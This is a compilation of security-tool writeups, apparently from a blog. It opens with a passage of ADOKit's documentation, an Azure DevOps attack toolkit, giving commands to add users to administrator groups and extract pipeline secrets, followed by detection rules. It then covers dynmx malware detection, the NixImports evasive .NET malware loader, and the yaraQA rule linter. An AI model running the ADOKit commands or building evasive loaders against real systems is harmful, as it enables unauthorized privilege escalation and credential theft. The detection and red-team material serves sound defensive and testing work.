C:\>ADOKit.exe addcollectionadmin /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: addcollectionadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 4:04:40 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------------------- ------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | | John Smith
[YourOrganization]\Project Collection Administrators | | User 1

4/4/23 20:04:43 Finished execution of addcollectionadmin

Remove Collection Admin

Use Case

Remove a user from the Project Collection Administrators group.


Provide the removecollectionadmin module along with a /user: for a given user to be removed from the Project Collection Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionadmin /credential:apiKey /url: /user:"someUser"

ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionadmin /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: removecollectionadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/4/2023 4:10:35 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------
[YourOrganization]\Project Collection Administrators | | John Smith

4/4/23 20:10:38 Finished execution of removecollectionadmin

Add Collection Build Admin

Use Case

Add a user to the Project Collection Build Administrators group.


Provide the addcollectionbuildadmin module along with a /user: for a given user to be added to the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildadmin /credential:apiKey /url: /user:"someUser"

ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildadmin /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: addcollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 8:21:39 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Build Administrators group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
---------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Administrators | | User 1

4/5/23 12:21:42 Finished execution of addcollectionbuildadmin

Remove Collection Build Admin

Use Case

Remove a user from the Project Collection Build Administrators group.


Provide the removecollectionbuildadmin module along with a /user: for a given user to be removed from the Project Collection Build Administrators group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildadmin /credential:apiKey /url: /user:"someUser"

ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildadmin /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: removecollectionbuildadmin
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 8:21:59 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Build Administrators group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
--------------------------------------------------------------------------------- -----------------------------------------------------------------------------------------------

4/5/23 12:22:02 Finished execution of removecollectionbuildadmin

Add Collection Build Service Account

Use Case

Add a user to the Project Collection Build Service Accounts group.


Provide the addcollectionbuildsvc module along with a /user: for a given user to be added to the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionbuildsvc /credential:apiKey /url: /user:"someUser"

ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionbuildsvc /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: addcollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 8:22:13 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
------------------------------------------------------------------------------------------------ --------------------------------------------------------------------------------
[YourOrganization]\Project Collection Build Service Accounts | | User 1

4/5/23 12:22:15 Finished execution of addcollectionbuildsvc

Remove Collection Build Service Account

Use Case

Remove a user from the Project Collection Build Service Accounts group.


Provide the removecollectionbuildsvc module along with a /user: for a given user to be removed from the Project Collection Build Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionbuildsvc /credential:apiKey /url: /user:"someUser"

ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionbuildsvc /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: removecollectionbuildsvc
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 8:22:27 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Build Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
----------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------

4/5/23 12:22:28 Finished execution of removecollectionbuildsvc

Add Collection Service Account

Use Case

Add a user to the Project Collection Service Accounts group.


Provide the addcollectionsvc module along with a /user: for a given user to be added to the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe addcollectionsvc /credential:apiKey /url: /user:"someUser"

ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe addcollectionsvc /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: addcollectionsvc
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 11:21:01 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to add user1 to the Project Collection Service Accounts group.

[+] SUCCESS: User successfully added

Group | Mail Address | Display Name
--------------------------------------------------------------------------------------------------------------- -----------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | | John Smith
[YourOrganization]\Project Collection Service Accounts | | User 1

4/5/23 15:21:04 Finished execution of addcollectionsvc

Remove Collection Service Account

Use Case

Remove a user from the Project Collection Service Accounts group.


Provide the removecollectionsvc module along with a /user: for a given user to be removed from the Project Collection Service Accounts group. Additionally, provide along any relevant authentication information and URL. See Module Details Table for the permissions needed to perform this action.

ADOKit.exe removecollectionsvc /credential:apiKey /url: /user:"someUser"

ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url: /user:"someUser"

Example Output

C:\>ADOKit.exe removecollectionsvc /credential:"UserAuthentication=ABC123" /url: /user:"user1"

Module: removecollectionsvc
Auth Type: Cookie
Search Term:
Target URL:

Timestamp: 4/5/2023 11:21:43 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

[*] INFO: Attempting to remove user1 from the Project Collection Service Accounts group.

[+] SUCCESS: User successfully removed

Group | Mail Address | Display Name
-------------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------
[YourOrganization]\Project Collection Service Accounts | | John Smith

4/5/23 15:21:44 Finished execution of removecollectionsvc

Get Pipeline Variables

Use Case

Extract any pipeline variables being used in project(s), which could contain credentials or other useful information.


Provide the getpipelinevars module along with a /project: for a given project to extract any pipeline variables being used. If you would like to extract pipeline variables from all projects specify all in the /project: argument.

ADOKit.exe getpipelinevars /credential:apiKey /url: /project:"someProject"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url: /project:"someProject"

ADOKit.exe getpipelinevars /credential:apiKey /url: /project:"all"

ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url: /project:"all"

Example Output

C:\>ADOKit.exe getpipelinevars /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap"

Module: getpipelinevars
Auth Type: Cookie
Project: maraudersmap
Target URL:

Timestamp: 4/6/2023 12:08:35 PM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Pipeline Var Name | Pipeline Var Value
credential | P@ssw0rd123!
url | http://blah/

4/6/23 16:08:36 Finished execution of getpipelinevars

Get Pipeline Secrets

Use Case

Extract the names of any pipeline secrets being used in project(s), which will direct the operator where to attempt to perform secret extraction.


Provide the getpipelinesecrets module along with a /project: for a given project to extract the names of any pipeline secrets being used. If you would like to extract the names of pipeline secrets from all projects specify all in the /project: argument.

ADOKit.exe getpipelinesecrets /credential:apiKey /url: /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url: /project:"someProject"

ADOKit.exe getpipelinesecrets /credential:apiKey /url: /project:"all"

ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url: /project:"all"

Example Output

C:\>ADOKit.exe getpipelinesecrets /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap"

Module: getpipelinesecrets
Auth Type: Cookie
Project: maraudersmap
Target URL:

Timestamp: 4/10/2023 10:28:37 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Build Secret Name | Build Secret Value
anotherSecretPass | [HIDDEN]
secretpass | [HIDDEN]

4/10/23 14:28:38 Finished execution of getpipelinesecrets

Get Service Connections

Use Case

List any service connections being used in project(s), which will direct the operator where to attempt to perform credential extraction for any service connections being used.


Provide the getserviceconnections module along with a /project: for a given project to list any service connections being used. If you would like to list service connections being used from all projects specify all in the /project: argument.

ADOKit.exe getserviceconnections /credential:apiKey /url: /project:"someProject"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url: /project:"someProject"

ADOKit.exe getserviceconnections /credential:apiKey /url: /project:"all"

ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url: /project:"all"

Example Output

C:\>ADOKit.exe getserviceconnections /credential:"UserAuthentication=ABC123" /url: /project:"maraudersmap"

Module: getserviceconnections
Auth Type: Cookie
Project: maraudersmap
Target URL:

Timestamp: 4/11/2023 8:34:16 AM

[*] INFO: Checking credentials provided

[+] SUCCESS: Credentials provided are VALID.

Connection Name | Connection Type | ID
Test Connection Name | generic | 195d960c-742b-4a22-a1f2-abd2c8c9b228
Not Real Connection | generic | cd74557e-2797-498f-9a13-6df692c22cac
Azure subscription 1(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | 5665ed5f-3575-4703-a94d-00681fdffb04
Azure subscription 1(1)(47c5aaab-dbda-44ca-802e-00801de4db23) | azurerm | df8c023b-b5ad-4925-a53d-bb29f032c382

4/11/23 12:34:16 Finished execution of getserviceconnections


Below are static signatures for the specific usage of this tool in its default state:

  • Project GUID - {60BC266D-1ED5-4AB5-B0DD-E1001C3B1498}
  • See ADOKit Yara Rule in this repo.
  • User Agent String - ADOKit-21e233d4334f9703d1a3a42b6e2efd38
  • See ADOKit Snort Rule in this repo.
  • Microsoft Sentinel Rules
  • ADOKitUsage.json - Detects the usage of ADOKit with any auditable event (e.g., adding a user to a group)
  • PersistenceTechniqueWithADOKit.json - Detects the creation of a PAT or SSH key with ADOKit

For detection guidance of the techniques used by the tool, see the X-Force Red whitepaper.


  • Support for Azure DevOps Server



Dynmx - Signature-based Detection Of Malware Features Based On Windows API Call Sequences

By: Zion3R

dynmx (spoken dynamics) is a signature-based detection approach for behavioural malware features based on Windows API call sequences. In a simplified way, you can think of dynmx as a sort of YARA for API call traces (so called function logs) originating from malware sandboxes. Hence, the data basis for the detection approach are not the malware samples themselves which are analyzed statically but data that is generated during a dynamic analysis of the malware sample in a malware sandbox. Currently, dynmx supports function logs of the following malware sandboxes:

  • VMRay (function log, text-based and XML format)
  • CAPEv2 (report.json file)
  • Cuckoo (report.json file)

The detection approach is described in detail in the master thesis Signature-Based Detection of Behavioural Malware Features with Windows API Calls. This project is the prototype implementation of this approach and was developed in the course of the master thesis. The signatures are manually defined by malware analysts in the dynmx signature DSL and can be detected in function logs with the help of this tool. Features and syntax of the dynmx signature DSL can also be found in the master thesis. Furthermore, you can find sample dynmx signatures in the repository dynmx-signatures. In addition to detecting malware features based on API calls, dynmx can extract OS resources that are used by the malware (a so called Access Activity Model). These resources are extracted by examining the API calls and reconstructing operations on OS resources. Currently, OS resources of the categories filesystem, registry and network are considered in the model.


In the following section, examples are shown for the detection of malware features and for the extraction of resources.


For this example, we choose the malware sample with the SHA-256 hash sum c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3. According to MalwareBazaar, the sample belongs to the malware family Amadey. There is a public VMRay analysis report of this sample available which also provides the function log traced by VMRay. This function log will be our data basis which we will use for the detection.

If we would like to know if the malware sample uses an injection technique called Process Hollowing, we can try to detect the following dynmx signature in the function log.

name: process_hollow
title: Process Hollowing
description: Detection of Process hollowing malware feature
# Create legit process in suspended mode
- api_call: ["CreateProcess[AW]", "CreateProcessInternal[AW]"]
- argument: "dwCreationFlags"
operation: "flag is set"
value: 0x4
- return_value: "return"
operation: "is not"
value: 0
- name: "hProcess"
as: "proc_handle"
- name: "hThread"
as: "thread_handle"
# Injection of malicious code into memory of previously created process
- variant:
- path:
# Allocate memory with read, write, execute permission
- api_call: ["VirtualAllocE x", "VirtualAlloc", "(Nt|Zw)AllocateVirtualMemory"]
- argument: ["hProcess", "ProcessHandle"]
operation: "is"
value: "$(proc_handle)"
- argument: ["flProtect", "Protect"]
operation: "is"
value: 0x40
- api_call: ["WriteProcessMemory"]
- argument: "hProcess"
operation: "is"
value: "$(proc_handle)"
- api_call: ["SetThreadContext", "(Nt|Zw)SetContextThread"]
- argument: "hThread"
operation: "is"
value: "$(thread_handle)"
- path:
# Map memory section with read, write, execute permission
- api_call: "(Nt|Zw)MapViewOfSection"
- argument: "ProcessHandle"
operation: "is"
value: "$(proc_handle)"
- argument: "AccessProtection"
operation: "is"
value: 0x40
# Resume thread to run injected malicious code
- api_call: ["ResumeThread", "(Nt|Zw)ResumeThread"]
- argument: ["hThread", "ThreadHandle"]
operation: "is"
value: "$(thread_handle)"
condition: proc_hollow as sequence

Based on the signature, we can find some DSL features that make dynmx powerful:

  • Definition of API call sequences with alternative paths
  • Matching of API call function names with regular expressions
  • Matching of argument and return values with several operators
  • Storage of variables, e.g. in order to track handles in the API call sequence
  • Definition of a detection condition with boolean operators (AND, OR, NOT)

If we run dynmx with the signature shown above against the function of the sample c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3, we get the following output indicating that the signature was detected.

$ python3 detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml

__| _ _ _ _ _
/ | | | / |/ | / |/ |/ | /\/
\_/|_/ \_/|/ | |_/ | | |_/ /\_/

Ver. 0.5 (PoC), by 0x534a

[+] Parsing 1 function log(s)
[+] Loaded 1 dynmx signature(s)
[+] Starting detection process with 1 worker(s). This probably takes some time...

[+] Result
process_hollow c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt

We can get into more detail by setting the output format to detail. Now, we can see the exact API call sequence that was detected in the function log. Furthermore, we can see that the signature was detected in the process 51f0.exe.

$ python3 -f detail detect -i 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json -s process_hollow.yml

__| _ _ _ _ _
/ | | | / |/ | / |/ |/ | /\/
\_/|_/ \_/|/ | |_/ | | |_/ /\_/

Ver. 0.5 (PoC), by 0x534a

[+] Parsing 1 function log(s)
[+] Loaded 1 dynmx signature(s)
[+] Starting detection process with 1 worker(s). This probably takes some time...

[+] Result
Function log: c0832b1008aa0fc828654f9762e37bda019080cbdd92bd2453a05cfb3b79abb3.txt
Signature: process_hollow
Process: 51f0.exe (PID: 3768)
Number of Findings: 1
Finding 0
proc_hollow : API Call CreateProcessA (Function log line 20560, index 938)
proc_hollow : API Call VirtualAllocEx (Function log line 20566, index 944)
proc_hollow : API Call WriteProcessMemory (Function log line 20573, index 951)
proc_hollow : API Call SetThreadContext (Function log line 20574, index 952)
proc_hollow : API Call ResumeThread (Function log line 20575, index 953)


In order to extract the accessed OS resources from a function log, we can simply run the dynmx command resources against the function log. An example of the detailed output is shown below for the sample with the SHA-256 hash sum 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9. This is a CAPE sandbox report which is part of the Avast-CTU Public CAPEv2 Dataset.

$ python3 -f detail resources --input 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json

__| _ _ _ _ _
/ | | | / |/ | / |/ |/ | /\/
\_/|_/ \_/|/ | |_/ | | |_/ /\_/

Ver. 0.5 (PoC), by 0x534a

[+] Parsing 1 function log(s)
[+] Processing function log(s) with the command 'resources'...

[+] Result
Function log: 601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json (/Users/sijansen/Documents/dev/dynmx_flogs/cape/Public_Avast_CTU_CAPEv2_Dataset_Full/extracted/601941f00b194587c9e57c5fabaf1ef11596179bea007df9bdcdaa10f162cac9.json)
Process: 601941F00B194587C9E5.exe (PID: 2008)
C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
C:\Windows\SysWOW64\ntdll.dll (READ)
C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)
Process: 601941F00B194587C9E5.exe (PID: 1800)
C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
C:\Windows\SysWOW64\ntdll.dll (READ)
C:\Users\comp\AppData\Local\vscmouse (READ)
C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe:Zone.Identifier (DELETE)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)
Process: vscmouse.exe (PID: 900)
C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
C:\Windows\SysWOW64\ntdll.dll (READ)
C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C urrentVersion\Setup (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\DevicePath (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck (READ)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings (READ)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only (READ)
Process: vscmouse.exe (PID: 3036)
C:\Windows\SysWOW64\en-US\SETUPAPI.dll.mui (CREATE)
API-MS-Win-Core-LocalRegistry-L1-1-0.dll (EXECUTE)
C:\Windows\SysWOW64\ntdll.dll (READ)
C:\Windows\Globalization\Sorting\sortdefault.nls (CREATE)
C:\ (READ)
C:\Windows\System32\uxtheme.dll (EXECUTE)
dwmapi.dll (EXECUTE)
advapi32.dll (EXECUTE)
shell32.dll (EXECUTE)
C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe (CREATE,READ)
C:\Users\comp\AppData\Local\iproppass\iproppass.exe (DELETE)
crypt32.dll (EXECUTE)
urlmon.dll (EXECUTE)
userenv.dll (EXECUTE)
wininet.dll (EXECUTE)
wtsapi32.dll (EXECUTE)
ole32.dll (EXECUTE)
C:\Windows\SysWOW64\oleaut32.dll (EXECUTE)
C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\ (CREATE)
C:\Users\comp\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\rasphone.pbk (CREATE,READ)
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup (READ)

Based on the shown output and the accessed resources, we can deduce some malware features:

  • Within the process 601941F00B194587C9E5.exe (PID 1800), the Zone Identifier of the file C:\Users\comp\AppData\Local\vscmouse\vscmouse.exe is deleted
  • Some DLLs are loaded dynamically
  • The process vscmouse.exe (PID: 3036) connects to the network endpoints and

The accessed resources are interesting for identifying host- and network-based detection indicators. In addition, resources can be used in dynmx signatures. A popular example is the detection of persistence mechanisms in the Registry.


In order to use the software Python 3.9 must be available on the target system. In addition, the following Python packages need to be installed:

  • anytree,
  • lxml,
  • pyparsing,
  • PyYAML,
  • six and
  • stringcase

To install the packages run the pip3 command shown below. It is recommended to use a Python virtual environment instead of installing the packages system-wide.

pip3 install -r requirements.txt


To use the prototype, simply run the main entry point The usage information can be viewed with the -h command line parameter as shown below.

$ python3 -h
usage: [-h] [--format {overview,detail}] [--show-log] [--log LOG] [--log-level {debug,info,error}] [--worker N] {detect,check,convert,stats,resources} ...

Detect dynmx signatures in dynamic program execution information (function logs)

optional arguments:
-h, --help show this help message and exit
--format {overview,detail}, -f {overview,detail}
Output format
--show-log Show all log output on stdout
--log LOG, -l LOG log file
--log-level {debug,info,error}
Log level (default: info)
--worker N, -w N Number of workers to spawn (default: number of processors - 2)

task to perform

detect Detects a dynmx signature
check Checks the syntax of dynmx signature(s)
convert Converts function logs to the dynmx generic function log format
stats Statistics of function logs
resources Resource activity derived from function log

In general, as shown in the output, several command line parameters regarding the log handling, the output format for results or multiprocessing can be defined. Furthermore, a command needs be chosen to run a specific task. Please note, that the number of workers only affects commands that make use of multiprocessing. Currently, these are the commands detect and convert.

The commands have specific command line parameters that can be explored by giving the parameter -h to the command, e.g. for the detect command as shown below.

$ python3 detect -h
usage: detect [-h] --sig SIG [SIG ...] --input INPUT [INPUT ...] [--recursive] [--json-result JSON_RESULT] [--runtime-result RUNTIME_RESULT] [--detect-all]

optional arguments:
-h, --help show this help message and exit
--recursive, -r Search for input files recursively
--json-result JSON_RESULT
JSON formatted result file
--runtime-result RUNTIME_RESULT
Runtime statistics file formatted in CSV
--detect-all Detect signature in all processes and do not stop after the first detection

required arguments:
--sig SIG [SIG ...], -s SIG [SIG ...]
dynmx signature(s) to detect
--input INPUT [INPUT ...], -i INPUT [INPUT ...]
Input files

As a user of dynmx, you can decide how the output is structured. If you choose to show the log on the console by defining the parameter --show-log, the output consists of two sections (see listing below). The log is shown first and afterwards the results of the used command. By default, the log is neither shown in the console nor written to a log file (which can be defined using the --log parameter). Due to multiprocessing, the entries in the log file are not necessarily in chronological order.

__| _ _ _ _ _
/ | | | / |/ | / |/ |/ | /\/
\_/|_/ \_/|/ | |_/ | | |_/ /\_/

Ver. 0.5 (PoC), by 0x534a

[+] Log output
2023-06-27 19:07:38,068+0000 [INFO] (__main__) [PID: 13315] []: Start of dynmx run
[+] End of log output

[+] Result

The level of detail of the result output can be defined using the command line parameter --output-format which can be set to overview for a high-level result or to detail for a detailed result. For example, if you define the output format to detail, detection results shown in the console will contain the exact API calls and resources that caused the detection. The overview output format will just indicate what signature was detected in which function log.

Example Command Lines

Detection of a dynmx signature in a function log with one worker process

python3 -w 1 detect -i "flog.txt" -s dynmx_signature.yml

Conversion of a function log to the dynmx generic function log format

python3 convert -i "flog.txt" -o /tmp/

Check a signature (only basic sanity checks)

python3 check -s dynmx_signature.yml

Get a detailed list of used resources used by a malware sample based on the function log (access activity model)

python3 -f detail resources -i "flog.txt"


Please consider that this tool is a proof-of-concept which was developed besides writing the master thesis. Hence, the code quality is not always the best and there may be bugs and errors. I tried to make the tool as robust as possible in the given time frame.

The best way to troubleshoot errors is to enable logging (on the console and/or to a log file) and set the log level to debug. Exception handlers should write detailed errors to the log which can help troubleshooting.

NixImports - A .NET Malware Loader, Using API-Hashing To Evade Static Analysis

By: Zion3R

A .NET malware loader, using API-Hashing and dynamic invoking to evade static analysis

How does it work?

NixImports uses my managed API-Hashing implementation HInvoke, to dynamically resolve most of it's called functions at runtime. To resolve the functions HInvoke requires two hashes the typeHash and the methodHash. These hashes represent the type name and the methods FullName, on runtime HInvoke parses the entire mscorlib to find the matching type and method. Due to this process, HInvoke does not leave any import references to the methods called trough it.

Another interesting feature of NixImports is that it avoids calling known methods as much as possible, whenever applicable NixImports uses internal methods instead of their wrappers. By using internal methods only we can evade basic hooks and monitoring employed by some security tools.

For a more detailed explanation checkout my blog post.

You can generate hashes for HInvoke using this tool

How to use

NixImports only requires a filepath to the .NET binary you want to pack with it.

NixImports.exe <filepath>

It will automatically generate a new executable called Loader.exe in it's root folder. The loader executable will contain your encoded payload and the stub code required to run it.

Tips for Defenders

If youre interested in detection engineering and possible detection of NixImports, checkout the last section of my blog post

Or click here for a basic yara rule covering NixImports.

yaraQA - YARA Rule Analyzer To Improve Rule Quality And Performance

By: Zion3R

YARA rule Analyzer to improve rule quality and performance


YARA rules can be syntactically correct but still dysfunctional. yaraQA tries to find and report these issues to the author or maintainer of a YARA rule set.

The issues yaraQA tries to detect are e.g.:

  • rules that are syntactically correct but never match due to errors in the condition (e.g. rule with one string and 2 of them in the condition)
  • rules that use string and modifier combinations that are probably wrong (e.g. $ = "\\Debug\\" fullword)
  • performance issues caused by short atoms, repeating characters or loops (e.g. $ = "AA"; can be excluded from the analysis using --ignore-performance)

I'm going to extend the test set over time. Each minor version will include new features or new tests.

Install requirements

pip install -r requirements.txt


directory (YARA rules folders, separated by space) -o outfile Output file that lists the issues (JSON, default: 'yaraQA-issues.json') -b baseline Use a issues baseline (issues found and reviewed before) to filter issues -l level Minium level to show (1=informational, 2=warning, 3=critical) --ignore-performance Suppress performance-related rule issues --debug Debug output" dir="auto">
usage: [-h] [-f yara files [yara files ...]] [-d yara files [yara files ...]] [-o outfile] [-b baseline] [-l level]
[--ignore-performance] [--debug]


optional arguments:
-h, --help show this help message and exit
-f yara files [yara files ...]
Path to input files (one or more YARA rules, separated by space)
-d yara files [yara files ...]
Path to input directory (YARA rules folders, separated by space)
-o outfile Output file that lists the issues (JSON, default: 'yaraQA-issues.json')
-b baseline Use a issues baseline (issues found and reviewed before) to filter issues
-l level Minium level to show (1=informational, 2=warning, 3=critical)
--ignore-performance Suppress performance-related rule issues
--debug Debug output

Try it out

python3 -d ./test/

Suppress all performance issues and only show detection / logic issues.

python3 -d ./test/ --ignore-performance

Suppress all issues of informational character

python3 -d ./test/ -level 2

Use a baseline to only see new issues (not the ones that you've already reviewed). The baseline file is an old JSON output of a reviewed state.

python3 -d ./test/ -b yaraQA-reviewed-issues.json

Example Rules with Issues

Example rules with issues can be found in the ./test folder.


yaraQA writes the detected issues to a file named yaraQA-issues.json by default.

This listing shows an example of the output generated by yaraQA in JSON format:

binary 0 in front or a space after the string). Every additional byte helps." }, { "rule": "Demo_Rule_3_Fullword_FilePath_Section", "id": "SM3", "issue": "The rule uses a string with the modifier 'fullword' but it starts and ends with two backslashes and thus the modifier could lead to a dysfunctional rule.", "element": { "name": "$s1", "value": "\\\\ZombieBoy\\\\", "type": "text", "modifiers": [ "ascii", "fullword" ] }, "level": "warning", "type": "logic", "recommendation": "Remove the 'fullword' modifier" }, { "rule": "Demo_Rule_4_Condition_Never_Matches", "id": "CE1", "issue": "The rule uses a condition that will never match", "element": { "condition_segment": "2 of", "num_of_strings": 1 }, "level": "error", "type": "logic", "recommendation": "Fix the condition" }, { "rule": "Demo_Rule_5_Condition_Short_String_At_Pos", "id": "PA1", "issue": "This rule looks for a short string at a particular position. A short string represents a short atom and could be rewritten to an expression using uint(x) at position.", "element": { "condition_segment": "$mz at 0", "string": "$mz", "value": "MZ" }, "level": "warning", "type": "performance", "recommendation": "" }, { "rule": "Demo_Rule_5_Condition_Short_String_At_Pos", "id": "PA2", "issue": "The rule contains a string that turns out to be a very short atom, which could cause a reduced performance of the complete rule set or increased memory usage.", "element": { "name": "$mz", "value": "MZ", "type": "text", "modifiers": [ "ascii" ] }, "level": "warning", "type": "performance", "recommendation": "Try to avoid using such short atoms, by e.g. adding a few more bytes to the beginning or the end (e.g. add a binary 0 in front or a space after the string). Every additional byte helps." }, { "rule": "Demo_Rule_6_Condition_Short_Byte_At_Pos", "id": "PA1", "issue": "This rule looks for a short string at a particular position. A short string represents a short atom and could be rewritten to an expression using uint(x) at position.", "element": { "condition_segment": "$mz at 0", "string": "$mz", "value": "{ 4d 5a }" }, "level": "warning", "type": "performance", "recommendation": "" }, 